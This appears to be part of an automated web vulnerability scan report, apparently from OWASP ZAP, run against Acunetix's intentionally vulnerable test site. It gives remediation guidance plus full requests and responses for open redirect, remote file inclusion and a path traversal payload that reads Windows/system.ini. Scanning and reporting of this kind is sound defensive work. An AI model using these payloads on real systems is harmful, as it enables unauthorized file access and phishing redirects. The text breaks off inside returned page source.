Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies.
For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters.
Consult the XSS Prevention Cheat Sheet for more details on the types of encoding and escaping that are needed.
Phase: Architecture and Design
For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.
Phase: Implementation
For every web page that is generated, use and specify a character encoding such as ISO-8859-1 or UTF-8. When an encoding is not specified, the web browser may choose a different encoding by guessing which encoding is actually being used by the web page. This can cause the web browser to treat certain sequences as special, opening up the client to subtle XSS attacks. See CWE-116 for more mitigations related to encoding/escaping.
To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere.
|
| Reference |
http://projects.webappsec.org/Cross-Site-Scripting
http://cwe.mitre.org/data/definitions/79.html |
| Tags |
OWASP_2021_A03
WSTG-v42-INPV-01 OWASP_2017_A07 |
| CWE Id | 79 |
| WASC Id | 8 |
| Plugin Id | 40012 |
|
High |
External Redirect |
|---|---|
| Description |
URL redirectors represent common functionality employed by web sites to forward an incoming request to an alternate resource. This can be done for a variety of reasons and is often done to allow resources to be moved within the directory structure and to avoid breaking functionality for users that request the resource at its previous location. URL redirectors may also be used to implement load balancing, leveraging abbreviated URLs or recording outgoing links. It is this last implementation which is often used in phishing attacks as described in the example below. URL redirectors do not necessarily represent a direct security vulnerability but can be abused by attackers trying to social engineer victims into believing that they are navigating to a site other than the true destination.
|
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=73982610993231700.owasp.org |
| Method | GET |
| Parameter | RetURL |
| Attack | 73982610993231700.owasp.org |
| Evidence | 73982610993231700.owasp.org |
| Request Header - size: 407 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=73982610993231700.owasp.org HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 225 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: 73982610993231700.owasp.org Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:55:16 GMT Content-Length: 148 |
| Response Body - size: 148 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="73982610993231700.owasp.org">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=73982610993231700.owasp.org |
| Method | POST |
| Parameter | RetURL |
| Attack | 73982610993231700.owasp.org |
| Evidence | 73982610993231700.owasp.org |
| Request Header - size: 449 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=73982610993231700.owasp.org HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 225 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: 73982610993231700.owasp.org Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:55:00 GMT Content-Length: 148 |
| Response Body - size: 148 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="73982610993231700.owasp.org">here</a>.</body> |
| Instances | 2 |
| Solution |
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
Use an allow list of approved URLs or domains to be used for redirection.
Use an intermediate disclaimer page that provides the user with a clear warning that they are leaving your site. Implement a long timeout before the redirect occurs, or force the user to click on the link. Be careful to avoid XSS problems when generating the disclaimer page.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
For example, ID 1 could map to "/login.asp" and ID 2 could map to "http://www.example.com/". Features such as the ESAPI AccessReferenceMap provide this capability.
Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.
Many open redirect problems occur because the programmer assumed that certain inputs could not be modified, such as cookies and hidden form fields.
|
| Reference |
http://projects.webappsec.org/URL-Redirector-Abuse
http://cwe.mitre.org/data/definitions/601.html |
| Tags |
OWASP_2021_A03
WSTG-v42-CLNT-04 OWASP_2017_A01 |
| CWE Id | 601 |
| WASC Id | 38 |
| Plugin Id | 20019 |
|
High |
Path Traversal |
|---|---|
| Description |
The Path Traversal attack technique allows an attacker access to files, directories, and commands that potentially reside outside the web document root directory. An attacker may manipulate a URL in such a way that the web site will execute or reveal the contents of arbitrary files anywhere on the web server. Any device that exposes an HTTP-based interface is potentially vulnerable to Path Traversal.
Most web sites restrict user access to a specific portion of the file-system, typically called the "web document root" or "CGI root" directory. These directories contain the files intended for user access and the executable necessary to drive web application functionality. To access files or execute commands anywhere on the file-system, Path Traversal attacks will utilize the ability of special-characters sequences.
The most basic Path Traversal attack uses the "../" special-character sequence to alter the resource location requested in the URL. Although most popular web servers will prevent this technique from escaping the web document root, alternate encodings of the "../" sequence may help bypass the security filters. These method variations include valid and invalid Unicode-encoding ("..%u2216" or "..%c0%af") of the forward slash character, backslash characters ("..\") on Windows-based servers, URL encoded characters "%2e%2e%2f"), and double URL encoding ("..%255c") of the backslash character.
Even if the web server properly restricts Path Traversal attempts in the URL path, a web application itself may still be vulnerable due to improper handling of user-supplied input. This is a common problem of web applications that use template mechanisms or load static text from files. In variations of the attack, the original URL parameter value is substituted with the file name of one of the web application's dynamic scripts. Consequently, the results can reveal source code because the file is interpreted as text instead of an executable script. These techniques often employ additional special characters such as the dot (".") to reveal the listing of the current working directory, or "%00" NULL characters in order to bypass rudimentary file extension checks.
|
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=Logout.asp |
| Method | GET |
| Parameter | RetURL |
| Attack | Logout.asp |
| Evidence | |
| Request Header - size: 390 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=Logout.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:54:20 GMT Content-Length: 3559 |
| Response Body - size: 3,559 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum forums</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Forum</td> <td class="tableheader">Threads</td> <td class="tableheader">Posts</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>97</td><td>97</td><td>3/14/2022 7:54:07 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>3/14/2022 5:30:18 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>6</td><td>6</td><td>3/13/2022 3:34:42 PM</td></tr> </table><!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=Login.asp |
| Method | POST |
| Parameter | RetURL |
| Attack | Login.asp |
| Evidence | |
| Request Header - size: 431 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=Login.asp HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:41 GMT Content-Length: 3122 |
| Response Body - size: 3,122 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FLogin%2Easp%3F" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Templatize.asp?item=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini |
| Method | GET |
| Parameter | item |
| Attack | ../../../../../../../../../../../../../../../../Windows/system.ini |
| Evidence | [drivers] |
| Request Header - size: 437 bytes. |
GET http://testasp.vulnweb.com/Templatize.asp?item=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:54:27 GMT Content-Length: 3180 |
| Response Body - size: 3,180 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>Untitled Document</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3D%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252FWindows%252Fsystem%2Eini" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3D%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252F%2E%2E%252FWindows%252Fsystem%2Eini" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| Instances | 3 |
| Solution |
Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use an allow list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. Do not rely exclusively on looking for malicious or malformed inputs (i.e., do not rely on a deny list). However, deny lists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if you are expecting colors such as "red" or "blue."
For filenames, use stringent allow lists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses, and exclude directory separators such as "/". Use an allow list of allowable file extensions.
Warning: if you attempt to cleanse your data, then do so that the end result is not in the form that can be dangerous. A sanitizing mechanism can remove characters such as '.' and ';' which may be required for some exploits. An attacker can try to fool the sanitizing mechanism into "cleaning" data into a dangerous form. Suppose the attacker injects a '.' inside a filename (e.g. "sensi.tiveFile") and the sanitizing mechanism removes the character resulting in the valid filename, "sensitiveFile". If the input data are now assumed to be safe, then the file may be compromised.
Inputs should be decoded and canonicalized to the application's current internal representation before being validated. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allow list schemes by introducing dangerous inputs after they have been checked.
Use a built-in path canonicalization function (such as realpath() in C) that produces the canonical version of the pathname, which effectively removes ".." sequences and symbolic links.
Run your code using the lowest privileges that are required to accomplish the necessary tasks. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by your software.
OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows you to specify restrictions on file operations.
This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
|
| Reference |
http://projects.webappsec.org/Path-Traversal
http://cwe.mitre.org/data/definitions/22.html |
| Tags |
OWASP_2021_A01
WSTG-v42-ATHZ-01 OWASP_2017_A05 |
| CWE Id | 22 |
| WASC Id | 33 |
| Plugin Id | 6 |
|
High |
Remote File Inclusion |
|---|---|
| Description |
Remote File Include (RFI) is an attack technique used to exploit "dynamic file include" mechanisms in web applications. When web applications take user input (URL, parameter value, etc.) and pass them into file include commands, the web application might be tricked into including remote files with malicious code.
Almost all web application frameworks support file inclusion. File inclusion is mainly used for packaging common code into separate files that are later referenced by main application modules. When a web application references an include file, the code in this file may be executed implicitly or explicitly by calling specific procedures. If the choice of module to load is based on elements from the HTTP request, the web application might be vulnerable to RFI.
An attacker can use RFI for:
* Running malicious code on the server: any code in the included malicious files will be run by the server. If the file include is not executed using some wrapper, code in include files is executed in the context of the server user. This could lead to a complete system compromise.
* Running malicious code on clients: the attacker's malicious code can manipulate the content of the response sent to the client. The attacker can embed malicious code in the response that will be run by the client (for example, JavaScript to steal the client session cookies).
PHP is particularly vulnerable to RFI attacks due to the extensive use of "file includes" in PHP programming and due to default server configurations that increase susceptibility to an RFI attack.
|
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=http%3A%2F%2Fwww.google.com%2F |
| Method | GET |
| Parameter | RetURL |
| Attack | http://www.google.com/ |
| Evidence | <title>Google</title> |
| Request Header - size: 410 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=http%3A%2F%2Fwww.google.com%2F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 1,245 bytes. |
HTTP/1.1 200 OK
Date: Mon, 14 Mar 2022 07:54:49 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: ASPSESSIONIDCQRDQBRC=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=www.google.com Set-Cookie: ASPSESSIONIDCQRDQBRC=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.www.google.com Set-Cookie: ASPSESSIONIDCQRDQBRC=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=google.com Set-Cookie: ASPSESSIONIDCQRDQBRC=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.google.com Set-Cookie: NID=511=tJm_hPN4GhM3MGC036RpwBJi0mpe3W1GoYHfzuvIPimlR8O-OosdjjPUSt1vydjMXEBPyV6LxJPXOy3zxlmsfT1tYpEVW3C0t2lqz0YDSORaL1GKTSWhkEd5fYUsk2gLu7QNExlw_N4Ack-bpcA-pkw6vJIFttFfcWIDj3rhlfc; expires=Tue, 13-Sep-2022 07:54:49 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Accept-Encoding |
| Response Body - size: 111,350 bytes. |
<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-IN"><head><meta charset="UTF-8"><meta content="origin" name="referrer"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><link href="/manifest?pwa=webhp" crossorigin="use-credentials" rel="manifest"><title>Google</title><script nonce="8M/qAlUr4l/+csJGNfb3NA==">(function(){window.google={kEI:'yfQuYoCLLoHz-QajyqPIBQ',kEXPI:'31',kBL:'skq8'};google.sn='webhp';google.kHL='en-IN';})();(function(){
var f=this||self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute||!(b=a.getAttribute("eid")));)a=a.parentNode;return b||h}function m(a){for(var b=null;a&&(!a.getAttribute||!(b=a.getAttribute("leid")));)a=a.parentNode;return b} function n(a,b,c,d,g){var e="";c||-1!==b.search("&ei=")||(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+"&cad="+b+e+"&zx="+Date.now()+d;/^http:/i.test(c)&&"https:"===window.location.protocol&&(google.ml&&google.ml(Error("a"),!1,{src:c,glmm:1}),c="");return c};h=google.kEI;google.getEI=l;google.getLEI=m;google.ml=function(){return null};google.log=function(a,b,c,d,g){if(c=n(a,b,c,d,g)){a=new Image;var e=k.length;k[e]=a;a.onerror=a.onload=a.onabort=function(){delete k[e]};a.src=c}};google.logUrl=n;}).call(this);(function(){ google.y={};google.sy=[];google.x=function(a,b){if(a)var c=a.id;else{do c=Math.random();while(google.y[c])}google.y[c]=[a,b];return!1};google.sx=function(a){google.sy.push(a)};google.lm=[];google.plm=function(a){google.lm.push.apply(google.lm,a)};google.lq=[];google.load=function(a,b,c){google.lq.push([[a],b,c])};google.loadAll=function(a,b){google.lq.push([a,b])};google.bx=!1;google.lx=function(){};}).call(this);google.f={};(function(){ document.documentElement.addEventListener("submit",function(b){var a;if(a=b.target){var c=a.getAttribute("data-submitfalse");a="1"===c||"q"===c&&!a.elements.q.value?!0:!1}else a=!1;a&&(b.preventDefault(),b.stopPropagation())},!0);document.documentElement.addEventListener("click",function(b){var a;a:{for(a=b.target;a&&a!==document.documentElement;a=a.parentElement)if("A"===a.tagName){a="1"===a.getAttribute("data-nohref");break a}a=!1}a&&b.preventDefault()},!0);}).call(this);(function(){google.hs={h:true,nhs:false,sie:false};})();(function(){google.c={btfi:false,frt:false,gl:true,lhc:false,ll:true,nli:false,timl:false,wve:true};(function(){ var e=this||self;var g=window.performance;google.timers={};google.startTick=function(a){google.timers[a]={t:{start:Date.now()},e:{},m:{}}};google.tick=function(a,b,c){google.timers[a]||google.startTick(a);c=void 0!==c?c:Date.now();b instanceof Array||(b=[b]);for(var d=0,f;f=b[d++];)google.timers[a].t[f]=c};google.c.e=function(a,b,c){google.timers[a].e[b]=c};google.c.b=function(a){var b=google.timers.load.m;b[a]&&google.ml(Error("a"),!1,{m:a});b[a]=!0};google.c.u=function(a){var b=google.timers.load.m;if(b[a]){b[a]=!1;for(a in b)if(b[a])return;google.csiReport()}else{var c="",d;for(d in b)c+=d+":"+b[d]+";";google.ml(Error("b"),!1,{m:a,b:!1===b[a],s:c})}};function h(a,b,c,d){a.addEventListener?a.addEventListener(b,c,d||!1):a.attachEvent&&a.attachEvent("on"+b,c)}function k(a,b,c,d){"addEventListener"in a?a.removeEventListener(b,c,d||!1):a.attachEvent&&a.detachEvent("on"+b,c)} google.rll=function(a,b,c){function 